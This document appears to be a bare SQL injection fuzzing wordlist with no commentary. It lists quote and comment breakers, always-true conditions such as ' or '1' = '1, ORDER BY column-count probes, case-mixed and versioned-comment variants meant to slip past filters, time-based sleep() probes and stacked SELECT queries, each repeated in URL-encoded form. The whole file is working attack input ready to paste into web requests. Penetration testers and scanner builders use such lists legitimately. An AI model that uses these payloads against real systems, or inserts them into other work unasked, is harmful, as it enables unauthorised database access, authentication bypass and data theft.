'
"
`
-- -
#
/*
;
1 or 1 = 1
1 or 1 = 1 -- -
1 or 1 = 1 #
1 or 1 = 1 /*
1) or (1 = 1
1) or (1 = 1 -- -
1) or (1 = 1 #
1) or (1 = 1 /*
1) or (1) = (1
1) or (1) = (1 -- -
1) or (1) = (1 #
1) or (1) = (1 /*
1 -- -
1 #
1 /*
1) -- -
1) #
1) /*
' or '1' = '1
' or '1' = '1' -- -
' or '1' = '1' #
' or '1' = '1' /*
') or ('1' = '1
') or ('1') = ('1
" or "1" = "1
") or ("1" = "1
") or ("1") = ("1
' -- -
" -- -
' #
" #
' /*
" /*
') -- -
") -- -
') #
") #
') /*
") /*
')) -- -
")) -- -
')) #
")) #
')) /*
")) /*
) -- -
) #
) /*
)) -- -
)) #
)) /*
' and '1' = '1
' and '1' = '1' -- -
' and '1' = '1' #
' and '1' = '1' /*
') and ('1' = '1
') and ('1') = ('1
" and "1" = "1
") and ("1" = "1
") and ("1") = ("1
1 and 1 = 1
1 and 1 = 1 -- -
1 and 1 = 1 #
1 and 1 = 1 /*
1) and (1 = 1
1) and (1 = 1 -- -
1) and (1 = 1 #
1) and (1 = 1 /*
1) and (1) = (1
1) and (1) = (1 -- -
1) and (1) = (1 #
1) and (1) = (1 /*
' || '1' = '1
' || '1' = '1' -- -
' || '1' = '1' #
' || '1' = '1' /*
') || ('1' = '1
') || ('1') = ('1
" || "1" = "1
") || ("1" = "1
") || ("1") = ("1
1 || 1 = 1
1 || 1 = 1 -- -
1 || 1 = 1 #
1 || 1 = 1 /*
1) || (1 = 1
1) || (1 = 1 -- -
1) || (1 = 1 #
1) || (1 = 1 /*
1) || (1) = (1
1) || (1) = (1 -- -
1) || (1) = (1 #
1) || (1) = (1 /*
' && '1' = '1
' && '1' = '1' -- -
' && '1' = '1' #
' && '1' = '1' /*
') && ('1' = '1
') && ('1') = ('1
" && "1" = "1
") && ("1" = "1
") && ("1") = ("1
1 && 1 = 1
1 && 1 = 1 -- -
1 && 1 = 1 #
1 && 1 = 1 /*
1) && (1 = 1
1) && (1 = 1 -- -
1) && (1 = 1 #
1) && (1 = 1 /*
1) && (1) = (1
1) && (1) = (1 -- -
1) && (1) = (1 #
1) && (1) = (1 /*
' orDeR by 1 -- -
' orDeR by 1 #
' orDeR by 1 /*
' orDeR by 1337 -- -
' ordeR by 1337 #
' ordeR by 1337 /*
" orDeR by 1 -- -
" orDeR by 1 #
" orDeR by 1 /*
" orDeR by 1337 -- -
" ordeR by 1337 #
" ordeR by 1337 /*
') orDeR by 1 -- -
') orDeR by 1 #
') orDeR by 1 /*
') orDeR by 1337 -- -
') ordeR by 1337 #
') ordeR by 1337 /*
") orDeR by 1 -- -
") orDeR by 1 #
") orDeR by 1 /*
") orDeR by 1337 -- -
") ordeR by 1337 #
") ordeR by 1337 /*
' orORDeRdeR by 1 -- -
' orORDeRdeR by 1 #
' orORDeRdeR by 1 /*
' orORDeRdeR by 1337 -- -
' orORDeRdeR by 1337 #
' orORDeRdeR by 1337 /*
" orORDeRdeR by 1 -- -
" orORDeRdeR by 1 #
" orORDeRdeR by 1 /*
" orORDeRdeR by 1337 -- -
" orORDeRdeR by 1337 #
" orORDeRdeR by 1337 /*
') orORDeRdeR by 1 -- -
') orORDeRdeR by 1 #
') orORDeRdeR by 1 /*
') orORDeRdeR by 1337 -- -
') orORDeRdeR by 1337 #
') orORDeRdeR by 1337 /*
") orORDeRdeR by 1 -- -
") orORDeRdeR by 1 #
") orORDeRdeR by 1 /*
") orORDeRdeR by 1337 -- -
") orORDeRdeR by 1337 #
") orORDeRdeR by 1337 /*'
' /*!ORDER BY*/ 1 -- -
' /*!ORDER BY*/ 1 #
' /*!ORDER BY*/ 1 /*
' /*!ORDER BY*/ 1337 -- -
' /*!ORDER BY*/ 1337 #
' /*!ORDER BY*/ 1337 /*
" /*!ORDER BY*/ 1 -- -
" /*!ORDER BY*/ 1 #
" /*!ORDER BY*/ 1 /*
" /*!ORDER BY*/ 1337 -- -
" /*!ORDER BY*/ 1337 #
" /*!ORDER BY*/ 1337 /*
') /*!ORDER BY*/ 1 -- -
') /*!ORDER BY*/ 1 #
') /*!ORDER BY*/ 1 /*
') /*!ORDER BY*/ 1337 -- -
') /*!ORDER BY*/ 1337 #
') /*!ORDER BY*/ 1337 /*
") /*!ORDER BY*/ 1 -- -
") /*!ORDER BY*/ 1 #
") /*!ORDER BY*/ 1 /*
") /*!ORDER BY*/ 1337 -- -
") /*!ORDER BY*/ 1337 #
") /*!ORDER BY*/ 1337 /*
' /*!50000ORDER*//**//*!50000BY*/ 1 -- -
' /*!50000ORDER*//**//*!50000BY*/ 1 #
' /*!50000ORDER*//**//*!50000BY*/ 1 /*
' /*!50000ORDER*//**//*!50000BY*/ 1337 -- -
' /*!50000ORDER*//**//*!50000BY*/ 1337 #
' /*!50000ORDER*//**//*!50000BY*/ 1337 /*
" /*!50000ORDER*//**//*!50000BY*/ 1 -- -
" /*!50000ORDER*//**//*!50000BY*/ 1 #
" /*!50000ORDER*//**//*!50000BY*/ 1 /*
" /*!50000ORDER*//**//*!50000BY*/ 1337 -- -
" /*!50000ORDER*//**//*!50000BY*/ 1337 #
" /*!50000ORDER*//**//*!50000BY*/ 1337 /*
') /*!50000ORDER*//**//*!50000BY*/ 1 -- -
') /*!50000ORDER*//**//*!50000BY*/ 1 #
') /*!50000ORDER*//**//*!50000BY*/ 1 /*
') /*!50000ORDER*//**//*!50000BY*/ 1337 -- -
') /*!50000ORDER*//**//*!50000BY*/ 1337 #
') /*!50000ORDER*//**//*!50000BY*/ 1337 /*
") /*!50000ORDER*//**//*!50000BY*/ 1 -- -
") /*!50000ORDER*//**//*!50000BY*/ 1 #
") /*!50000ORDER*//**//*!50000BY*/ 1 /*
") /*!50000ORDER*//**//*!50000BY*/ 1337 -- -
") /*!50000ORDER*//**//*!50000BY*/ 1337 #
") /*!50000ORDER*//**//*!50000BY*/ 1337 /*
' oR sleep(5) -- -
' oR sleep(5) #
' oR sleep(5) /*
' AnD sleep(5) -- -
' AnD sleep(5) #
' AnD sleep(5) /*
') AnD sleep(5) -- -
') AnD sleep(5) #
') AnD sleep(5) /*
" oR sleep(5) -- -
" oR sleep(5) #
" oR sleep(5) /*
" AnD sleep(5) -- -
" AnD sleep(5) #
" AnD sleep(5) /*
") AnD sleep(5) -- -
") AnD sleep(5) #
") AnD sleep(5) /*
' = '1' aNd sleep(4) anD '1' = '1
' = '2' Or sleep(4) anD '1' = '1
" = "1" aNd sleep(4) anD "1" = "1
" = "2" Or sleep(4) anD "1" = "1
' = '1' aNd sleep(4) anD '1' = '1' -- -
' = '2' Or sleep(4) anD '1' = '1' -- -
' = '1' aNd sleep(4) anD '1' = '1' #
' = '2' Or sleep(4) anD '1' = '1' #
' = '1' aNd sleep(4) anD '1' = '1' /*
' = '2' Or sleep(4) anD '1' = '1' /*
" = "1" aNd sleep(4) anD "1" = "1" -- -
" = "2" Or sleep(4) anD "1" = "1" -- -
" = "1" aNd sleep(4) anD "1" = "1" #
" = "2" Or sleep(4) anD "1" = "1" #
" = "1" aNd sleep(4) anD "1" = "1" /*
" = "2" Or sleep(4) anD "1" = "1" /*
1 = 1 aNd sleep(4) anD 1 = 1
1 = 2 Or sleep(4) anD 1 = 1
1 = 1 aNd sleep(4) anD '1' = '1' -- -
1 = 2 Or sleep(4) anD '1' = '1' -- -
1 = 1 aNd sleep(4) anD '1' = '1' #
1 = 2 Or sleep(4) anD '1' = '1' #
1 = 1 aNd sleep(4) anD '1' = '1' /*
1 = 2 Or sleep(4) anD '1' = '1' /*
1 aNd sleep(4) -- -
1 aNd sleep(4) #
1 aNd sleep(4) /*
1 Or sleep(4) -- -
1 Or sleep(4) #
1 Or sleep(4) /*
' || sleep(5) -- -
' || sleep(5) #
' || sleep(5) /*
' && sleep(5) -- -
' && sleep(5) #
' && sleep(5) /*
') && sleep(5) -- -
') && sleep(5) #
') && sleep(5) /*
" || sleep(5) -- -
" || sleep(5) #
" || sleep(5) /*
" && sleep(5) -- -
" && sleep(5) #
" && sleep(5) /*
") && sleep(5) -- -
") && sleep(5) #
") && sleep(5) /*
' = '1' && sleep(4) && '1' = '1
' = '2' || sleep(4) && '1' = '1
" = "1" && sleep(4) && "1" = "1
" = "2" || sleep(4) && "1" = "1
' = '1' && sleep(4) && '1' = '1' -- -
' = '2' || sleep(4) && '1' = '1' -- -
' = '1' && sleep(4) && '1' = '1' #
' = '2' || sleep(4) && '1' = '1' #
' = '1' && sleep(4) && '1' = '1' /*
' = '2' || sleep(4) && '1' = '1' /*
" = "1" && sleep(4) && "1" = "1" -- -
" = "2" || sleep(4) && "1" = "1" -- -
" = "1" && sleep(4) && "1" = "1" #
" = "2" || sleep(4) && "1" = "1" #
" = "1" && sleep(4) && "1" = "1" /*
" = "2" || sleep(4) && "1" = "1" /*
1 = 1 && sleep(4) && 1 = 1
1 = 2 || sleep(4) && 1 = 1
1 = 1 && sleep(4) && '1' = '1' -- -
1 = 2 || sleep(4) && '1' = '1' -- -
1 = 1 && sleep(4) && '1' = '1' #
1 = 2 || sleep(4) && '1' = '1' #
1 = 1 && sleep(4) && '1' = '1' /*
1 = 2 || sleep(4) && '1' = '1' /*
1 && sleep(4) -- -
1 && sleep(4) #
1 && sleep(4) /*
1 || sleep(4) -- -
1 || sleep(4) #
1 || sleep(4) /*
'
"
`
--+-
#
/*
1+or+1+=+1
1+or+1+=+1+--+-
1+or+1+=+1+#
1+or+1+=+1+/*
1)+or+(1+=+1
1)+or+(1+=+1+--+-
1)+or+(1+=+1+#
1)+or+(1+=+1+/*
1)+or+(1)+=+(1
1)+or+(1)+=+(1+--+-
1)+or+(1)+=+(1+#
1)+or+(1)+=+(1+/*
1+--+-
1+#
1+/*
1)+--+-
1)+#
1)+/*
'+or+'1'+=+'1
'+or+'1'+=+'1'+--+-
'+or+'1'+=+'1'+#
'+or+'1'+=+'1'+/*
')+or+('1'+=+'1
')+or+('1')+=+('1
"+or+"1"+=+"1
")+or+("1"+=+"1
")+or+("1")+=+("1
'+--+-
"+--+-
'+#
"+#
'+/*
"+/*
')+--+-
")+--+-
')+#
")+#
')+/*
")+/*
'))+--+-
"))+--+-
'))+#
"))+#
'))+/*
"))+/*
)+--+-
)+#
)+/*
))+--+-
))+#
))+/*
'+and+'1'+=+'1
'+and+'1'+=+'1'+--+-
'+and+'1'+=+'1'+#
'+and+'1'+=+'1'+/*
')+and+('1'+=+'1
')+and+('1')+=+('1
"+and+"1"+=+"1
")+and+("1"+=+"1
")+and+("1")+=+("1
1+and+1+=+1
1+and+1+=+1+--+-
1+and+1+=+1+#
1+and+1+=+1+/*
1)+and+(1+=+1
1)+and+(1+=+1+--+-
1)+and+(1+=+1+#
1)+and+(1+=+1+/*
1)+and+(1)+=+(1
1)+and+(1)+=+(1+--+-
1)+and+(1)+=+(1+#
1)+and+(1)+=+(1+/*
'+||+'1'+=+'1
'+||+'1'+=+'1'+--+-
'+||+'1'+=+'1'+#
'+||+'1'+=+'1'+/*
')+||+('1'+=+'1
')+||+('1')+=+('1
"+||+"1"+=+"1
")+||+("1"+=+"1
")+||+("1")+=+("1
1+||+1+=+1
1+||+1+=+1+--+-
1+||+1+=+1+#
1+||+1+=+1+/*
1)+||+(1+=+1
1)+||+(1+=+1+--+-
1)+||+(1+=+1+#
1)+||+(1+=+1+/*
1)+||+(1)+=+(1
1)+||+(1)+=+(1+--+-
1)+||+(1)+=+(1+#
1)+||+(1)+=+(1+/*
'+&&+'1'+=+'1
'+&&+'1'+=+'1'+--+-
'+&&+'1'+=+'1'+#
'+&&+'1'+=+'1'+/*
')+&&+('1'+=+'1
')+&&+('1')+=+('1
"+&&+"1"+=+"1
")+&&+("1"+=+"1
")+&&+("1")+=+("1
1+&&+1+=+1
1+&&+1+=+1+--+-
1+&&+1+=+1+#
1+&&+1+=+1+/*
1)+&&+(1+=+1
1)+&&+(1+=+1+--+-
1)+&&+(1+=+1+#
1)+&&+(1+=+1+/*
1)+&&+(1)+=+(1
1)+&&+(1)+=+(1+--+-
1)+&&+(1)+=+(1+#
1)+&&+(1)+=+(1+/*
'+orDeR+by+1+--+-
'+orDeR+by+1+#
'+orDeR+by+1+/*
'+orDeR+by+1337+--+-
'+ordeR+by+1337+#
'+ordeR+by+1337+/*
"+orDeR+by+1+--+-
"+orDeR+by+1+#
"+orDeR+by+1+/*
"+orDeR+by+1337+--+-
"+ordeR+by+1337+#
"+ordeR+by+1337+/*
')+orDeR+by+1+--+-
')+orDeR+by+1+#
')+orDeR+by+1+/*
')+orDeR+by+1337+--+-
')+ordeR+by+1337+#
')+ordeR+by+1337+/*
")+orDeR+by+1+--+-
")+orDeR+by+1+#
")+orDeR+by+1+/*
")+orDeR+by+1337+--+-
")+ordeR+by+1337+#
")+ordeR+by+1337+/*
'+orORDeRdeR+by+1+--+-
'+orORDeRdeR+by+1+#
'+orORDeRdeR+by+1+/*
'+orORDeRdeR+by+1337+--+-
'+orORDeRdeR+by+1337+#
'+orORDeRdeR+by+1337+/*
"+orORDeRdeR+by+1+--+-
"+orORDeRdeR+by+1+#
"+orORDeRdeR+by+1+/*
"+orORDeRdeR+by+1337+--+-
"+orORDeRdeR+by+1337+#
"+orORDeRdeR+by+1337+/*
')+orORDeRdeR+by+1+--+-
')+orORDeRdeR+by+1+#
')+orORDeRdeR+by+1+/*
')+orORDeRdeR+by+1337+--+-
')+orORDeRdeR+by+1337+#
')+orORDeRdeR+by+1337+/*
")+orORDeRdeR+by+1+--+-
")+orORDeRdeR+by+1+#
")+orORDeRdeR+by+1+/*
")+orORDeRdeR+by+1337+--+-
")+orORDeRdeR+by+1337+#
")+orORDeRdeR+by+1337+/*'
'+/*!ORDER+BY*/+1+--+-
'+/*!ORDER+BY*/+1+#
'+/*!ORDER+BY*/+1+/*
'+/*!ORDER+BY*/+1337+--+-
'+/*!ORDER+BY*/+1337+#
'+/*!ORDER+BY*/+1337+/*
"+/*!ORDER+BY*/+1+--+-
"+/*!ORDER+BY*/+1+#
"+/*!ORDER+BY*/+1+/*
"+/*!ORDER+BY*/+1337+--+-
"+/*!ORDER+BY*/+1337+#
"+/*!ORDER+BY*/+1337+/*
')+/*!ORDER+BY*/+1+--+-
')+/*!ORDER+BY*/+1+#
')+/*!ORDER+BY*/+1+/*
')+/*!ORDER+BY*/+1337+--+-
')+/*!ORDER+BY*/+1337+#
')+/*!ORDER+BY*/+1337+/*
")+/*!ORDER+BY*/+1+--+-
")+/*!ORDER+BY*/+1+#
")+/*!ORDER+BY*/+1+/*
")+/*!ORDER+BY*/+1337+--+-
")+/*!ORDER+BY*/+1337+#
")+/*!ORDER+BY*/+1337+/*
'+/*!50000ORDER*//**//*!50000BY*/+1+--+-
'+/*!50000ORDER*//**//*!50000BY*/+1+#
'+/*!50000ORDER*//**//*!50000BY*/+1+/*
'+/*!50000ORDER*//**//*!50000BY*/+1337+--+-
'+/*!50000ORDER*//**//*!50000BY*/+1337+#
'+/*!50000ORDER*//**//*!50000BY*/+1337+/*
"+/*!50000ORDER*//**//*!50000BY*/+1+--+-
"+/*!50000ORDER*//**//*!50000BY*/+1+#
"+/*!50000ORDER*//**//*!50000BY*/+1+/*
"+/*!50000ORDER*//**//*!50000BY*/+1337+--+-
"+/*!50000ORDER*//**//*!50000BY*/+1337+#
"+/*!50000ORDER*//**//*!50000BY*/+1337+/*
')+/*!50000ORDER*//**//*!50000BY*/+1+--+-
')+/*!50000ORDER*//**//*!50000BY*/+1+#
')+/*!50000ORDER*//**//*!50000BY*/+1+/*
')+/*!50000ORDER*//**//*!50000BY*/+1337+--+-
')+/*!50000ORDER*//**//*!50000BY*/+1337+#
')+/*!50000ORDER*//**//*!50000BY*/+1337+/*
")+/*!50000ORDER*//**//*!50000BY*/+1+--+-
")+/*!50000ORDER*//**//*!50000BY*/+1+#
")+/*!50000ORDER*//**//*!50000BY*/+1+/*
")+/*!50000ORDER*//**//*!50000BY*/+1337+--+-
")+/*!50000ORDER*//**//*!50000BY*/+1337+#
")+/*!50000ORDER*//**//*!50000BY*/+1337+/*
'+oR+sleep(5)+--+-
'+oR+sleep(5)+#
'+oR+sleep(5)+/*
'+AnD+sleep(5)+--+-
'+AnD+sleep(5)+#
'+AnD+sleep(5)+/*
')+AnD+sleep(5)+--+-
')+AnD+sleep(5)+#
')+AnD+sleep(5)+/*
"+oR+sleep(5)+--+-
"+oR+sleep(5)+#
"+oR+sleep(5)+/*
"+AnD+sleep(5)+--+-
"+AnD+sleep(5)+#
"+AnD+sleep(5)+/*
")+AnD+sleep(5)+--+-
")+AnD+sleep(5)+#
")+AnD+sleep(5)+/*
'+=+'1'+aNd+sleep(4)+anD+'1'+=+'1
'+=+'2'+Or+sleep(4)+anD+'1'+=+'1
"+=+"1"+aNd+sleep(4)+anD+"1"+=+"1
"+=+"2"+Or+sleep(4)+anD+"1"+=+"1
'+=+'1'+aNd+sleep(4)+anD+'1'+=+'1'+--+-
'+=+'2'+Or+sleep(4)+anD+'1'+=+'1'+--+-
'+=+'1'+aNd+sleep(4)+anD+'1'+=+'1'+#
'+=+'2'+Or+sleep(4)+anD+'1'+=+'1'+#
'+=+'1'+aNd+sleep(4)+anD+'1'+=+'1'+/*
'+=+'2'+Or+sleep(4)+anD+'1'+=+'1'+/*
"+=+"1"+aNd+sleep(4)+anD+"1"+=+"1"+--+-
"+=+"2"+Or+sleep(4)+anD+"1"+=+"1"+--+-
"+=+"1"+aNd+sleep(4)+anD+"1"+=+"1"+#
"+=+"2"+Or+sleep(4)+anD+"1"+=+"1"+#
"+=+"1"+aNd+sleep(4)+anD+"1"+=+"1"+/*
"+=+"2"+Or+sleep(4)+anD+"1"+=+"1"+/*
1+=+1+aNd+sleep(4)+anD+1+=+1
1+=+2+Or+sleep(4)+anD+1+=+1
1+=+1+aNd+sleep(4)+anD+'1'+=+'1'+--+-
1+=+2+Or+sleep(4)+anD+'1'+=+'1'+--+-
1+=+1+aNd+sleep(4)+anD+'1'+=+'1'+#
1+=+2+Or+sleep(4)+anD+'1'+=+'1'+#
1+=+1+aNd+sleep(4)+anD+'1'+=+'1'+/*
1+=+2+Or+sleep(4)+anD+'1'+=+'1'+/*
1+aNd+sleep(4)+--+-
1+aNd+sleep(4)+#
1+aNd+sleep(4)+/*
1+Or+sleep(4)+--+-
1+Or+sleep(4)+#
1+Or+sleep(4)+/*
'+||+sleep(5)+--+-
'+||+sleep(5)+#
'+||+sleep(5)+/*
'+&&+sleep(5)+--+-
'+&&+sleep(5)+#
'+&&+sleep(5)+/*
')+&&+sleep(5)+--+-
')+&&+sleep(5)+#
')+&&+sleep(5)+/*
"+||+sleep(5)+--+-
"+||+sleep(5)+#
"+||+sleep(5)+/*
"+&&+sleep(5)+--+-
"+&&+sleep(5)+#
"+&&+sleep(5)+/*
")+&&+sleep(5)+--+-
")+&&+sleep(5)+#
")+&&+sleep(5)+/*
'+=+'1'+&&+sleep(4)+&&+'1'+=+'1
'+=+'2'+||+sleep(4)+&&+'1'+=+'1
"+=+"1"+&&+sleep(4)+&&+"1"+=+"1
"+=+"2"+||+sleep(4)+&&+"1"+=+"1
'+=+'1'+&&+sleep(4)+&&+'1'+=+'1'+--+-
'+=+'2'+||+sleep(4)+&&+'1'+=+'1'+--+-
'+=+'1'+&&+sleep(4)+&&+'1'+=+'1'+#
'+=+'2'+||+sleep(4)+&&+'1'+=+'1'+#
'+=+'1'+&&+sleep(4)+&&+'1'+=+'1'+/*
'+=+'2'+||+sleep(4)+&&+'1'+=+'1'+/*
"+=+"1"+&&+sleep(4)+&&+"1"+=+"1"+--+-
"+=+"2"+||+sleep(4)+&&+"1"+=+"1"+--+-
"+=+"1"+&&+sleep(4)+&&+"1"+=+"1"+#
"+=+"2"+||+sleep(4)+&&+"1"+=+"1"+#
"+=+"1"+&&+sleep(4)+&&+"1"+=+"1"+/*
"+=+"2"+||+sleep(4)+&&+"1"+=+"1"+/*
1+=+1+&&+sleep(4)+&&+1+=+1
1+=+2+||+sleep(4)+&&+1+=+1
1+=+1+&&+sleep(4)+&&+'1'+=+'1'+--+-
1+=+2+||+sleep(4)+&&+'1'+=+'1'+--+-
1+=+1+&&+sleep(4)+&&+'1'+=+'1'+#
1+=+2+||+sleep(4)+&&+'1'+=+'1'+#
1+=+1+&&+sleep(4)+&&+'1'+=+'1'+/*
1+=+2+||+sleep(4)+&&+'1'+=+'1'+/*
1+&&+sleep(4)+--+-
1+&&+sleep(4)+#
1+&&+sleep(4)+/*
1+||+sleep(4)+--+-
1+||+sleep(4)+#
1+||+sleep(4)+/*
'; SeleCT 1 -- -
"; SeleCT 1 -- -
'); SeleCT 1 -- -
"); SeleCT 1 -- -
')); SeleCT 1 -- -
")); SeleCT 1 -- -
'; SeleCT 1 #
"; SeleCT 1 #
'); SeleCT 1 #
"); SeleCT 1 #
')); SeleCT 1 #
")); SeleCT 1 #
'; SeleCT 1 /*
"; SeleCT 1 /*
'); SeleCT 1 /*
"); SeleCT 1 /*
')); SeleCT 1 /*
")); SeleCT 1 /*
';+SeleCT+1+--+-
";+SeleCT+1+--+-
');+SeleCT+1+--+-
");+SeleCT+1+--+-
'));+SeleCT+1+--+-
"));+SeleCT+1+--+-
';+SeleCT+1+#
";+SeleCT+1+#
');+SeleCT+1+#
");+SeleCT+1+#
'));+SeleCT+1+#
"));+SeleCT+1+#
';+SeleCT+1+/*
";+SeleCT+1+/*
');+SeleCT+1+/*
");+SeleCT+1+/*
'));+SeleCT+1+/*
"));+SeleCT+1+/*
abraca+dabra'"`)}];/*--+-#%00%0A
